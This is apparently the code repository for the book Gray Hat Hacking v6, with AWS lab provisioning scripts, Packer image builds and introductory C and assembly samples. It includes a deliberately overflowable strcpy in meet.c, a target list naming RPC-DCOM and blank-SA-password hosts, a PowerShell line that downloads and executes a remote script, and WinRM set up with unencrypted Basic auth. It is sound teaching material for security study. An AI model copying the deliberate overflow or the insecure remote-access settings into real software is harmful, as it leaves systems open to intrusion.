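for p in "${policies[@]}"; do
    aws iam detach-group-policy --group-name "$GROUP" --policy-arn "arn:aws:iam::aws:policy/$p"
done
aws iam delete-group --group-name "$GROUP"
# The key must go before the user: IAM will not delete a user that still owns
# access keys.
aws iam delete-access-key --user-name "$USER_NAME" \
    --access-key-id "$(jq -r .AccessKey.AccessKeyId key-out.json)"
aws iam delete-user --user-name "$USER_NAME"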
================================================
FILE: CloudSetup/eksall.template
================================================
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "eks:*",
"Resource": "*"
},
{
"Action": [
"ssm:GetParameter",
"ssm:GetParameters"
],
"Resource": [
"arn:aws:ssm:*:ACCTNO:parameter/aws/*",
"arn:aws:ssm:*::parameter/aws/*"
],
"Effect": "Allow"
},
{
"Action": [
"kms:CreateGrant",
"kms:DescribeKey"
],
"Resource": "*",
"Effect": "Allow"
}
]
}
================================================
FILE: CloudSetup/find-orphaned-snaps.sh
================================================
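#!/bin/bash
# Read-only companion to delete-orphaned-snaps.sh: lists every snapshot owned
# by this account and reports whether one of our AMIs still references it.
# Nothing is deleted, so this is the safe way to preview a clean-up.
RED='\033[0;31m'
WHITE='\033[0;37m'
GREEN='\033[0;32m'
NC='\033[0m' # No Color
PROFILE=ghh
REGION=us-east-1

printf "${WHITE}[*] Retrieving image list${NC}\n"
# Collect the snapshot behind EVERY block device of every image. The original
# query read only BlockDeviceMappings[0], so the second volume of a
# multi-volume image was reported as orphaned.
snaplist=$(aws ec2 describe-images --owner self \
    --query "Images[].BlockDeviceMappings[].Ebs.SnapshotId" --output text \
    --region="$REGION" --profile="$PROFILE") \
    || { echo "[-] describe-images failed" >&2; exit 1; }

printf "${WHITE}[*] Retrieving snapshot list${NC}\n"
allsnaps=$(aws ec2 describe-snapshots --owner self --profile="$PROFILE" --region="$REGION" \
    --query "Snapshots[*].SnapshotId" --output text) \
    || { echo "[-] describe-snapshots failed" >&2; exit 1; }

# Index the referenced ids once instead of rescanning the list per snapshot.
declare -A inuse
for l in $snaplist; do
    inuse["$l"]=1
done

for snap in $allsnaps; do
    if [ -n "${inuse[$snap]:-}" ]; then
        printf "${GREEN}[+] Snap %s is active${NC}\n" "$snap"
    else
        printf "${RED}[-] Snap %s is not active..${NC}\n" "$snap"
    fi
done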
================================================
FILE: CloudSetup/install-cloud-tools.sh
================================================
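#!/bin/bash
# Installs the tooling the AWS labs need for the current user: pip3,
# Ansible + pywinrm, and pinned Terraform/Packer binaries under ~/.local/bin.
# Safe to re-run; each step is idempotent.
set -euo pipefail

TF_VERSION=0.14.5
PACKER_VERSION=1.6.6
BIN_DIR="$HOME/.local/bin"
RELEASES=https://releases.hashicorp.com

#Kali VMWare Image doesn't have pip3
echo "[+] Installing Python3 pip"
sudo apt install python3-pip -y
echo "[+] Installing Ansible and pywinrm"
pip3 install --user ansible pywinrm

mkdir -p "$BIN_DIR"

# Download into a scratch directory so stray terraform*.zip / packer*.zip
# files in the caller's cwd are never picked up by the unzip step.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
cd "$WORK"

# fetch <product> <version>: downloads the release zip together with the
# SHA256SUMS file HashiCorp publishes for that release and refuses to install
# an archive that does not match. This catches a corrupted or substituted
# download; it does not replace verifying the SHA256SUMS signature, which the
# original did not do either.
fetch() {
    local product=$1 version=$2
    local zip="${product}_${version}_linux_amd64.zip"
    local sums="${product}_${version}_SHA256SUMS"
    echo "[+] Installing ${product} ${version}"
    wget -q "$RELEASES/$product/$version/$zip"
    wget -q "$RELEASES/$product/$version/$sums"
    # --ignore-missing: the sums file lists every platform's archive.
    sha256sum --check --ignore-missing "$sums"
    unzip -o "$zip" -d "$BIN_DIR"
}
fetch terraform "$TF_VERSION"
fetch packer "$PACKER_VERSION"

# The original appended to ./.bash_profile relative to the cwd, which the
# README's `. ~/.bash_profile` never reads; write to the home directory and
# only once.
PROFILE="$HOME/.bash_profile"
if ! grep -qs 'HOME/.local/bin' "$PROFILE"; then
    echo -e "PATH=\$HOME/.local/bin:\$PATH\nexport PATH\n" >> "$PROFILE"
fi
echo -e "Cloud tools installed.. to add them to your path type in:\n . ~/.bash_profile\n"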
================================================
FILE: CloudSetup/kali-base/config.sh
================================================
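#!/bin/bash
# Packer provisioner for the ghh-kali AMI: turns the Debian 10 base image
# selected in kali.hcl into Kali by adding the Kali archive key and repository
# and installing kali-linux-headless. Runs as root (kali.hcl invokes it via
# sudo). Steps are deliberately tolerant of individual failures; pipefail is
# set so a failed download is not masked by the consumer exiting 0.
export DEBIAN_FRONTEND=noninteractive
set -o pipefail
ERRORS=0
KEYRING=/usr/share/keyrings/kali-archive-keyring.gpg

apt-get update && apt-get -y upgrade
apt-get -y dist-upgrade
echo "# Installing software properties common"
apt-get install -y software-properties-common gnupg

# Fetch the Kali archive key into a dedicated keyring and bind it to the Kali
# repository with signed-by, instead of `apt-key add`, which trusts the key for
# every configured repository. The keyserver path is the original fallback for
# when the direct download fails; both should yield the same key.
echo "# Attempting to install kali keys"
if ! wget -q -O - https://archive.kali.org/archive-key.asc | gpg --dearmor -o "$KEYRING"; then
    echo "# Direct key download failed, trying keyserver"
    gpg --keyserver pgpkeys.mit.edu --recv-key ED444FF07D8D0BF6
    gpg --export ED444FF07D8D0BF6 > "$KEYRING"
fi
echo "deb [signed-by=$KEYRING] http://http.kali.org/kali kali-rolling main non-free contrib" \
    > /etc/apt/sources.list.d/kali.list
echo 'Acquire::Retries "3";' > /etc/apt/apt.conf.d/80-retries
apt-get update

echo "#Trying to install Kali components"
apt-get install -y kali-linux-headless || ERRORS=1
if [ $ERRORS -ne 0 ] ;then
    # Known failure mode: the metapackage install breaks on libcrypt1. Unpack
    # the package by hand and drop its libraries in place, then let apt
    # finish. Work in a throw-away directory so leftover libcrypt* files in
    # /tmp cannot be matched by the glob.
    echo "# Fixing Libcrypt... "
    FIXDIR=$(mktemp -d)
    (
        cd "$FIXDIR"
        apt -y download libcrypt1
        dpkg-deb -x libcrypt* .
        cp -av lib/x86_64-linux-gnu/* /lib/x86_64-linux-gnu/
    )
    rm -rf "$FIXDIR"
fi
apt -y --fix-broken install
# kali.hcl sets expect_disconnect because this restart may drop Packer's
# SSH session.
service sshd restart
echo "# Provisioning complete"
exit 0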
================================================
FILE: CloudSetup/kali-base/kali.hcl
================================================
# Newest Debian 10 AMI to build the Kali image on top of (config.sh converts
# it to Kali). The owner id is pinned so a look-alike public AMI with the same
# name from another account can never be selected.
data "amazon-ami" "ghh_kali" {
  profile     = "ghh"
  region      = "us-east-1"
  owners      = ["136693071363"]
  most_recent = true

  filters = {
    name                = "debian-10-amd64*"
    virtualization-type = "hvm"
    root-device-type    = "ebs"
  }
}
# Stand-in for the legacy JSON templates' "timestamp" function: strip the
# separators from timestamp() to get a compact, sortable stamp for ami_name.
locals {
  timestamp = regex_replace(timestamp(), "[- TZ:]", "")
}
# Launches the Debian AMI found above, provisions it and snapshots the result
# as ghh-kali-<timestamp>. The name is unique per build; delete-old-images.sh
# prunes everything but the newest.
source "amazon-ebs" "ghh_kali" {
  profile       = "ghh"
  region        = "us-east-1"
  source_ami    = data.amazon-ami.ghh_kali.id
  instance_type = "m3.large"
  ssh_username  = "admin"
  ami_name      = "ghh-kali-${local.timestamp}"

  # Enlarged root volume for the kali-linux-headless install done by config.sh.
  launch_block_device_mappings {
    device_name           = "/dev/xvda"
    volume_size           = 40
    volume_type           = "standard"
    delete_on_termination = true
  }
}
build {
  sources = ["source.amazon-ebs.ghh_kali"]

  # Troubleshooting aid: saves the build's SSH private key to /tmp so the
  # instance can be reached by hand. Keep it disabled for normal builds; when
  # it is enabled the key lands on the build host unencrypted and should be
  # removed as soon as the session is over.
  #provisioner "shell-local" {
  #  inline = ["echo '${build.SSHPrivateKey}' > /tmp/'${build.Host}'-session.pem"]
  #}

  provisioner "file" {
    source      = "config.sh"
    destination = "/tmp/config.sh"
  }

  # config.sh restarts sshd near the end, which may drop the session, hence
  # expect_disconnect.
  provisioner "shell" {
    inline            = ["chmod 755 /tmp/config.sh", "sudo /tmp/config.sh"]
    expect_disconnect = "true"
    skip_clean        = "true"
  }

  # Enable to pause the build and SSH in when something needs a closer look.
  # provisioner "breakpoint" {
  #   disable = false
  #   note    = "this is a breakpoint"
  # }
}
================================================
FILE: CloudSetup/provision.sh
================================================
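#!/bin/bash
# One-time AWS account setup for the GHH lab: creates the "ghh" IAM user and a long-lived access
# key, the ghh-group with the managed policies the lab needs plus a custom EKS policy rendered
# from eksall.template, and writes a [ghh] profile to ~/.aws/credentials.
#
# The first IAM calls run under the caller's default AWS profile. Every call that passes
# --profile=ghh needs the [ghh] profile to exist, so the credentials are written right after the
# access key is created; the original appended them at the very end, after three calls had
# already used the not-yet-existing profile.
# NOTE(review): the group gets IAMFullAccess, i.e. the ghh user can grant itself anything. Treat
# the key in key-out.json as a root-equivalent secret (it is chmod 600 below, not deleted).
AWS=$(command -v aws)
JQ=$(command -v jq)
if ! test -f "$AWS"; then
    echo "AWS cli is required for execution, please install and try again"
    exit 1
fi
if ! test -f "$JQ"; then
    echo "JQ is required for execution, please install and try again"
    exit 1   # the original printed the message but carried on without jq
fi

aws iam create-user --user-name ghh | tee user-out.json
aws iam create-access-key --user-name ghh | tee key-out.json
chmod 600 key-out.json   # holds the secret access key

ACCESS_KEY_ID=$(jq -r '.AccessKey.AccessKeyId' key-out.json)
SECRET_KEY=$(jq -r '.AccessKey.SecretAccessKey' key-out.json)
if [ -z "$ACCESS_KEY_ID" ] || [ "$ACCESS_KEY_ID" = "null" ]; then
    echo "Access key creation failed, see key-out.json"
    exit 1
fi
# Write the [ghh] profile now so the --profile=ghh calls below can resolve it.
umask 077
mkdir -p ~/.aws
printf '[ghh]\naws_access_key_id = %s\naws_secret_access_key = %s\n\n' "$ACCESS_KEY_ID" "$SECRET_KEY" >> ~/.aws/credentials
chmod 600 ~/.aws/credentials

aws iam create-group --group-name ghh-group | tee group-out.json
aws iam add-user-to-group --user-name ghh --group-name ghh-group
aws iam attach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/AmazonEC2FullAccess
aws iam attach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/AmazonS3FullAccess
aws iam attach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/IAMFullAccess
aws iam attach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/AmazonSSMFullAccess
aws iam attach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/AmazonRoute53FullAccess
aws iam attach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/AmazonEKSClusterPolicy
aws iam attach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/AWSCloudFormationFullAccess

# Account id of the new profile, needed to render the ARNs in eksall.template.
ACCT=$(aws sts get-caller-identity --profile=ghh --region=us-east-2 | jq -r '.Account')
if [ -z "$ACCT" ] || [ "$ACCT" = "null" ]; then
    echo "Could not resolve the account id through the ghh profile"
    exit 1
fi
sed -e "s/ACCTNO/$ACCT/g" eksall.template > eksall.json
aws iam create-policy --profile=ghh --policy-name GHHEKSAll --policy-document file://eksall.json | tee policydata
ARN=$(jq -r '.Policy.Arn' policydata)
aws iam attach-group-policy --group-name ghh-group --profile=ghh --policy-arn "$ARN"
echo "Provisioning complete"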
================================================
FILE: CloudSetup/server-2016-base/bootstrap.ps1
================================================
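# Packer build-time bootstrap for the Windows Server 2016 base image: turns off telemetry,
# installs Chocolatey, then schedules the EC2Launch readiness/initialisation scripts and runs
# Sysprep so the AMI generalises on first boot.

Write-Host "Disabling Telemetry..."
# Set-ItemProperty fails when the target key does not exist, and the DataCollection policy keys
# are not present on a fresh install; create each key first so the value is actually written.
$telemetryKeys = @(
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection",
    "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\DataCollection"
)
foreach ($key in $telemetryKeys) {
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name "AllowTelemetry" -Type DWord -Value 0
}

Write-Host "Disabling Telemetry services..."
# Set-Service emits no output unless -PassThru is given, so the original
# `Get-Service | Set-Service | Stop-Service` pipeline disabled the services but never stopped
# them. Stop and disable each one explicitly; a missing service is skipped rather than fatal.
# diagnosticshub.standardcollector.service = Microsoft (R) Diagnostics Hub Standard Collector Service
# DiagTrack = Diagnostics Tracking Service
foreach ($svc in @("diagnosticshub.standardcollector.service", "DiagTrack")) {
    $service = Get-Service -Name $svc -ErrorAction SilentlyContinue
    if ($null -ne $service) {
        Stop-Service -Name $svc -Force -ErrorAction SilentlyContinue
        Set-Service -Name $svc -StartupType Disabled
    }
}

Write-Host "Installing Chocolatey"
Set-ExecutionPolicy Bypass -Scope Process -Force;
# 3072 = SecurityProtocolType.Tls12, needed for chocolatey.org on older .NET defaults.
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
# NOTE(review): this executes whatever chocolatey.org serves at build time, with no version pin
# or hash check. For a reproducible, auditable image, fetch a pinned install.ps1 and verify its
# hash before handing it to iex.
iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))

# EC2Launch: register the readiness signal and first-boot initialisation as scheduled tasks,
# then generalise the instance without shutting it down (Packer stops it afterwards).
Write-Host "Starting SendWindowsIsReady"
C:\ProgramData\Amazon\EC2-Windows\Launch\Scripts\SendWindowsIsReady.ps1 -Schedule
Write-Host "Starting InitliazeInstance"
C:\ProgramData\Amazon\EC2-Windows\Launch\Scripts\InitializeInstance.ps1 -Schedule
Write-Host "performing Sysprep"
C:\ProgramData\Amazon\EC2-Windows\Launch\Scripts\SysprepInstance.ps1 -NoShutdown
Write-Host "SYSPREP Finished..."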
================================================
FILE: CloudSetup/server-2016-base/server2016_template.json
================================================
{
"variables": {
"name": "ghh-server2016-{{timestamp}}",
"aws_region": "us-east-1",
"aws_instance_type": "m3.large",
"description": "GHH-Server-2016"
},
"builders": [
{
"name": "{{user `name`}}",
"profile": "ghh",
"type": "amazon-ebs",
"communicator": "winrm",
"winrm_username": "Administrator",
"ami_name": "{{user `name`}}",
"ami_description": "{{user `description`}}",
"region": "{{user `aws_region`}}",
"instance_type": "{{user `aws_instance_type`}}",
"availability_zone": "us-east-1a",
"encrypt_boot": false,
"launch_block_device_mappings": [
{
"device_name": "/dev/sda1",
"volume_type": "gp2",
"volume_size": 30,
"delete_on_termination": true
}
],
"source_ami_filter": {
"filters": {
"virtualization-type": "hvm",
"root-device-type": "ebs",
"name": "Windows_Server-2016-English-Full-Base-*",
"owner-alias": "amazon",
"architecture": "x86_64"
},
"owners": [
"801119661308"
],
"most_recent": true
},
"user_data_file": "user_data.ps1"
}
],
"provisioners": [
{
"type": "powershell",
"script": "bootstrap.ps1"
}
]
}
================================================
FILE: CloudSetup/server-2016-base/user_data.ps1
================================================
<powershell>
# EC2 user-data for the Packer build of the Server 2016 base image: prepares a WinRM endpoint that
# Packer's "winrm" communicator (see server2016_template.json) can reach as Administrator.
# NOTE(review): the listener configured below is HTTP on 5985 with AllowUnencrypted, Basic and
# CredSSP enabled, so credentials and session traffic are in the clear. That is tolerable only for
# the build-time connection inside Packer's temporary security group; presumably these settings
# persist into the AMI unless something later resets them -- re-harden before wider use.
write-output "Running User Data Script"
write-host "(host) Running User Data Script"
Set-ExecutionPolicy Unrestricted -Scope LocalMachine -Force -ErrorAction Ignore
# Don't set this before Set-ExecutionPolicy as it throws an error
$ErrorActionPreference = "stop"
# "stop" only governs cmdlet errors; the cmd.exe /c commands below do not throw on a non-zero
# exit code, so a failed winrm/netsh step does not abort this script.
# Remove every existing WinRM listener (HTTP and HTTPS) so quickconfig creates a fresh HTTP one
Remove-Item -Path WSMan:\Localhost\listener\listener* -Recurse
# WinRM
write-output "Setting up WinRM"
write-host "(host) setting up WinRM"
cmd.exe /c winrm quickconfig -q
cmd.exe /c winrm quickconfig '-transport:http'
# 30-minute operation timeout and 1 GiB per remote shell, sized for long provisioning steps
cmd.exe /c winrm set "winrm/config" '@{MaxTimeoutms="1800000"}'
cmd.exe /c winrm set "winrm/config/winrs" '@{MaxMemoryPerShellMB="1024"}'
# Plaintext transport and Basic/CredSSP auth on both service and client sides (see note above)
cmd.exe /c winrm set "winrm/config/service" '@{AllowUnencrypted="true"}'
cmd.exe /c winrm set "winrm/config/client" '@{AllowUnencrypted="true"}'
cmd.exe /c winrm set "winrm/config/service/auth" '@{Basic="true"}'
cmd.exe /c winrm set "winrm/config/client/auth" '@{Basic="true"}'
cmd.exe /c winrm set "winrm/config/service/auth" '@{CredSSP="true"}'
cmd.exe /c winrm set "winrm/config/listener?Address=*+Transport=HTTP" '@{Port="5985"}'
cmd.exe /c netsh advfirewall firewall set rule group="remote administration" new enable=yes
# `netsh firewall` is the deprecated pre-advfirewall syntax; this opens 5985 to every source the
# security group admits
cmd.exe /c netsh firewall add portopening TCP 5985 "Port 5985"
cmd.exe /c net stop winrm
cmd.exe /c sc config winrm start= auto
cmd.exe /c net start winrm
# No "vagrant" account is created by this image (the template logs in as Administrator); this is
# presumably a leftover from a Vagrant-oriented base script and a no-op here -- confirm
cmd.exe /c wmic useraccount where "name='vagrant'" set PasswordExpires=FALSE
</powershell>
================================================
FILE: CloudSetup/server-2019-base/bootstrap.ps1
================================================
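# Packer build-time bootstrap for the Windows Server 2019 base image: turns off telemetry,
# installs Chocolatey, then schedules the EC2Launch readiness/initialisation scripts and runs
# Sysprep so the AMI generalises on first boot.

Write-Host "Disabling Telemetry..."
# Set-ItemProperty fails when the target key does not exist, and the DataCollection policy keys
# are not present on a fresh install; create each key first so the value is actually written.
$telemetryKeys = @(
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection",
    "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\DataCollection"
)
foreach ($key in $telemetryKeys) {
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name "AllowTelemetry" -Type DWord -Value 0
}

Write-Host "Disabling Telemetry services..."
# Set-Service emits no output unless -PassThru is given, so the original
# `Get-Service | Set-Service | Stop-Service` pipeline disabled the services but never stopped
# them. Stop and disable each one explicitly; a missing service is skipped rather than fatal.
# diagnosticshub.standardcollector.service = Microsoft (R) Diagnostics Hub Standard Collector Service
# DiagTrack = Diagnostics Tracking Service
foreach ($svc in @("diagnosticshub.standardcollector.service", "DiagTrack")) {
    $service = Get-Service -Name $svc -ErrorAction SilentlyContinue
    if ($null -ne $service) {
        Stop-Service -Name $svc -Force -ErrorAction SilentlyContinue
        Set-Service -Name $svc -StartupType Disabled
    }
}

Write-Host "Installing Chocolatey"
Set-ExecutionPolicy Bypass -Scope Process -Force;
# 3072 = SecurityProtocolType.Tls12, needed for chocolatey.org on older .NET defaults.
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
# NOTE(review): this executes whatever chocolatey.org serves at build time, with no version pin
# or hash check. For a reproducible, auditable image, fetch a pinned install.ps1 and verify its
# hash before handing it to iex.
iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))

# EC2Launch: register the readiness signal and first-boot initialisation as scheduled tasks,
# then generalise the instance without shutting it down (Packer stops it afterwards).
Write-Host "Starting SendWindowsIsReady"
C:\ProgramData\Amazon\EC2-Windows\Launch\Scripts\SendWindowsIsReady.ps1 -Schedule
Write-Host "Starting InitliazeInstance"
C:\ProgramData\Amazon\EC2-Windows\Launch\Scripts\InitializeInstance.ps1 -Schedule
Write-Host "performing Sysprep"
C:\ProgramData\Amazon\EC2-Windows\Launch\Scripts\SysprepInstance.ps1 -NoShutdown
Write-Host "SYSPREP Finished..."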
================================================
FILE: CloudSetup/server-2019-base/server2019_template.json
================================================
{
"variables": {
"name": "ghh-server2019-{{timestamp}}",
"aws_region": "us-east-1",
"aws_instance_type": "m3.large",
"description": "GHH-Server-2019"
},
"builders": [
{
"name": "{{user `name`}}",
"profile": "ghh",
"type": "amazon-ebs",
"communicator": "winrm",
"winrm_username": "Administrator",
"ami_name": "{{user `name`}}",
"ami_description": "{{user `description`}}",
"region": "{{user `aws_region`}}",
"instance_type": "{{user `aws_instance_type`}}",
"availability_zone": "us-east-1a",
"encrypt_boot": false,
"launch_block_device_mappings": [
{
"device_name": "/dev/sda1",
"volume_type": "gp2",
"volume_size": 30,
"delete_on_termination": true
}
],
"source_ami_filter": {
"filters": {
"virtualization-type": "hvm",
"root-device-type": "ebs",
"name": "Windows_Server-2019-English-Full-Base-*",
"owner-alias": "amazon",
"architecture": "x86_64"
},
"owners": [
"801119661308"
],
"most_recent": true
},
"user_data_file": "user_data.ps1"
}
],
"provisioners": [
{
"type": "powershell",
"script": "bootstrap.ps1"
}
]
}
================================================
FILE: CloudSetup/server-2019-base/user_data.ps1
================================================
<powershell>
# EC2 user-data for the Packer build of the Server 2019 base image: prepares a WinRM endpoint that
# Packer's "winrm" communicator (see server2019_template.json) can reach as Administrator.
# NOTE(review): the listener configured below is HTTP on 5985 with AllowUnencrypted, Basic and
# CredSSP enabled, so credentials and session traffic are in the clear. That is tolerable only for
# the build-time connection inside Packer's temporary security group; presumably these settings
# persist into the AMI unless something later resets them -- re-harden before wider use.
write-output "Running User Data Script"
write-host "(host) Running User Data Script"
Set-ExecutionPolicy Unrestricted -Scope LocalMachine -Force -ErrorAction Ignore
# Don't set this before Set-ExecutionPolicy as it throws an error
$ErrorActionPreference = "stop"
# "stop" only governs cmdlet errors; the cmd.exe /c commands below do not throw on a non-zero
# exit code, so a failed winrm/netsh step does not abort this script.
# Remove every existing WinRM listener (HTTP and HTTPS) so quickconfig creates a fresh HTTP one
Remove-Item -Path WSMan:\Localhost\listener\listener* -Recurse
# WinRM
write-output "Setting up WinRM"
write-host "(host) setting up WinRM"
cmd.exe /c winrm quickconfig -q
cmd.exe /c winrm quickconfig '-transport:http'
# 30-minute operation timeout and 1 GiB per remote shell, sized for long provisioning steps
cmd.exe /c winrm set "winrm/config" '@{MaxTimeoutms="1800000"}'
cmd.exe /c winrm set "winrm/config/winrs" '@{MaxMemoryPerShellMB="1024"}'
# Plaintext transport and Basic/CredSSP auth on both service and client sides (see note above)
cmd.exe /c winrm set "winrm/config/service" '@{AllowUnencrypted="true"}'
cmd.exe /c winrm set "winrm/config/client" '@{AllowUnencrypted="true"}'
cmd.exe /c winrm set "winrm/config/service/auth" '@{Basic="true"}'
cmd.exe /c winrm set "winrm/config/client/auth" '@{Basic="true"}'
cmd.exe /c winrm set "winrm/config/service/auth" '@{CredSSP="true"}'
cmd.exe /c winrm set "winrm/config/listener?Address=*+Transport=HTTP" '@{Port="5985"}'
cmd.exe /c netsh advfirewall firewall set rule group="remote administration" new enable=yes
# `netsh firewall` is the deprecated pre-advfirewall syntax; this opens 5985 to every source the
# security group admits
cmd.exe /c netsh firewall add portopening TCP 5985 "Port 5985"
cmd.exe /c net stop winrm
cmd.exe /c sc config winrm start= auto
cmd.exe /c net start winrm
# No "vagrant" account is created by this image (the template logs in as Administrator); this is
# presumably a leftover from a Vagrant-oriented base script and a no-op here -- confirm
cmd.exe /c wmic useraccount where "name='vagrant'" set PasswordExpires=FALSE
</powershell>
================================================
FILE: README.md
================================================
# GHHv6
Gray Hat Hacking v6
================================================
FILE: ch02/client.py
================================================
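#client.py
# Minimal TCP client: connect to the local server on port 4242, send a prompt, print the reply.
import socket

HOST, PORT = 'localhost', 4242

# create_connection() plus the context manager close the socket on every path, including when
# connect()/recv() raise; the original only reached s.close() on success.
with socket.create_connection((HOST, PORT)) as s:
    # sendall() loops until the whole buffer is written; send() may write only a prefix.
    s.sendall(b'Say something:')  # b tag added in python3 to indicate bytes not str
    data = s.recv(1024)
print('Received', data)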
================================================
FILE: ch02/fmt_str.c
================================================
#include <stdio.h>
/* Prints the same double twice to show how printf's width and precision fields
   ("%5.2f" -> "23.56", "%4.1f" -> "23.6") shape the output. */
int main(void) {
    const double value = 23.5644;
    const char *const formats[] = {
        "The value of x is %5.2f\n",
        "The value of x is %4.1f\n",
    };
    for (size_t k = 0; k < sizeof formats / sizeof formats[0]; ++k) {
        printf(formats[k], value);
    }
    return 0;
}
================================================
FILE: ch02/hello.asm
================================================
section .data ; section declaration
msg db "Hello, haxor!",0xa ; our string followed by a newline (0xa is a line feed, not a carriage return)
len equ $ - msg ; length of our string, $ means here
section .text ; mandatory section declaration
; export the entry point to the ELF linker or
global _start ; loaders conventionally recognize
; _start as their entry point
_start:
; now, write our string to stdout
; notice how arguments are loaded in reverse
; NOTE(review): int 0x80 is the legacy 32-bit syscall ABI (eax/ebx/ecx/edx); on x86-64 the kernel
; only sees the low 32 bits of rcx, so `msg` must sit below 4 GiB (non-PIE, statically linked build).
; The native 64-bit convention is `syscall` with rax=1 for write and rdi/rsi/rdx as arguments.
mov rdx,len ; third argument (message length)
mov rcx,msg ; second argument (pointer to message to write)
mov rbx,1 ; load first argument (file handle (stdout))
mov rax,4 ; system call number (4=sys_write)
int 0x80 ; call kernel interrupt (performs the write; the exit is the second call below)
mov rbx,0 ; load first syscall argument (exit code)
mov rax,1 ; system call number (1=sys_exit)
int 0x80 ; call kernel interrupt and exit
================================================
FILE: ch02/hello.c
================================================
// hello.c // customary comment of program name
#include <stdio.h> // needed for screen printing
int main(void) {             // required main function
    puts("Hello haxor!");    // puts appends the newline that printf's "\n" supplied
    return 0;                // explicit success status (implicit for main since C99)
}
================================================
FILE: ch02/ifelse.c
================================================
#include <stdio.h>
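/* Demonstrates if/else with continue and break inside an endless loop: the first pass
   prints "x = 0" and increments, the second pass prints "x != 0" and leaves the loop. */
int main(void) {
    int x = 0;
    while (1) {
        if (x == 0) {
            printf("x = %d\n", x);
            x++;
            continue;
        }
        /* x != 0: report it and leave the loop. */
        printf("x != 0\n");
        break;
    }
    /* The original had `return 0;` inside the loop, after an if/else whose branches both
       continue or break -- unreachable. The break path fell off the end of main instead,
       which yields the same status 0 under C99; make it explicit here. */
    return 0;
}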
================================================
FILE: ch02/meet.c
================================================
// meet.c
#include <stdio.h> // needed for screen printing
#include <string.h> // needed for strcpy
void greeting(char *temp1,char *temp2){ // greeting function to say hello
// Intentionally unsafe (the chapter's teaching example): strcpy copies temp2 up to its NUL
// with no regard for name's 400-byte capacity, so a second argument of 400 bytes or more
// writes past the buffer into the rest of the stack frame. A bounded copy (snprintf or
// strncpy with sizeof name) or a stack protector would prevent that; left as written here.
char name[400]; // string variable to hold the name
strcpy(name, temp2); // copy argument to name with the infamous strcpy
printf("Hello %s %s\n", temp1, name); // print out the greeting
}
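int main(int argc, char * argv[]){ // note the format for arguments
    // argv[1] / argv[2] are NULL when fewer than two arguments are given; the original
    // passed them on unchecked and crashed inside strcpy/printf.
    if (argc < 3) {
        fprintf(stderr, "Usage: %s <title> <name>\n", argv[0]);
        return 1;
    }
    greeting(argv[1], argv[2]); // call function, pass title & name
    printf("Bye %s %s\n", argv[1], argv[2]); // say "bye"
    return 0; // exit program
}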
================================================
FILE: ch02/memory.c
================================================
// memory.c
#include <stdlib.h>
#include <string.h>
/* memory.c */ // this comment simply holds the program name
// File-scope variables used to show where each kind of object is placed in the process image.
// NOTE(review): identifiers starting with an underscore are reserved at file scope in C; `_index`
// works in practice but a name such as `index_` is safer.
int _index = 5; // integer stored in data (initialized)
char * str; // string stored in bss (uninitialized); funct1 points it at heap memory
int nothing; // integer stored in bss (uninitialized)
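/* Allocates a 10-byte heap buffer into the global `str` and fills it with "abcde".
   Parameter c only exists to give the function a stack-resident local. */
void funct1(int c){ // bracket starts function1 block with argument (c)
    int i=c; // stored in the stack region
    str = (char*) malloc (10 * sizeof (char)); // Reserves 10 characters in
    // the heap region
    if (str == NULL) { // malloc can fail; the original wrote through the result regardless
        return;
    }
    strncpy(str, "abcde", 5); // copies 5 characters "abcde" into str
    str[5] = '\0'; // strncpy with count == source length writes no terminator and malloc'd
                   // memory is not zeroed, so terminate the string explicitly
    (void)i; // silence the unused-variable warning; i is illustrative only
} // end of function1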
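/* Entry point: `int main(void)` is the standard form; `void main` is non-portable. */
int main(void) { // the required main function
    funct1(1); // main calls function1 with an argument
    return 0;
} // end of the main function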
================================================
FILE: ch02/targets
================================================
RPC-DCOM 10.10.20.1,10.10.20.4
SQL-SA-blank-pw 10.10.20.27,10.10.20.28
================================================
FILE: ch02/while_ex.c
================================================
#include <stdio.h>
/* Prints "x = 0" through "x = 9", one per line. */
int main(void) {
    for (int x = 0; x < 10; ++x) {
        printf("x = %d\n", x);
    }
    return 0;
}
================================================
FILE: ch03/heapme_demo.c
================================================
//heapme_demo.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
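#define NCHUNKS 8
#define CHUNK_SIZE 0x38
void *x[NCHUNKS];
/* Heap demo: allocate eight 0x38-byte chunks, fill chunk i with the byte '0'+i, free them all in
   order, then block so the heap state can be inspected from a debugger. */
int main(void) {
    for (int i = 0; i < NCHUNKS; i++) {
        x[i] = malloc(CHUNK_SIZE);
        if (x[i] == NULL) { /* the original wrote through a NULL result on allocation failure */
            perror("malloc");
            return 1;
        }
        memset(x[i], (i + 0x30), CHUNK_SIZE); /* 0x30 + i == '0' + i */
    }
    for (int i = 0; i < NCHUNKS; i++)
        free(x[i]);
    fprintf(stderr, "Press CTRL+C to exit.\n");
    pause();
    return 0;
}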
================================================
FILE: ch03/hello.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
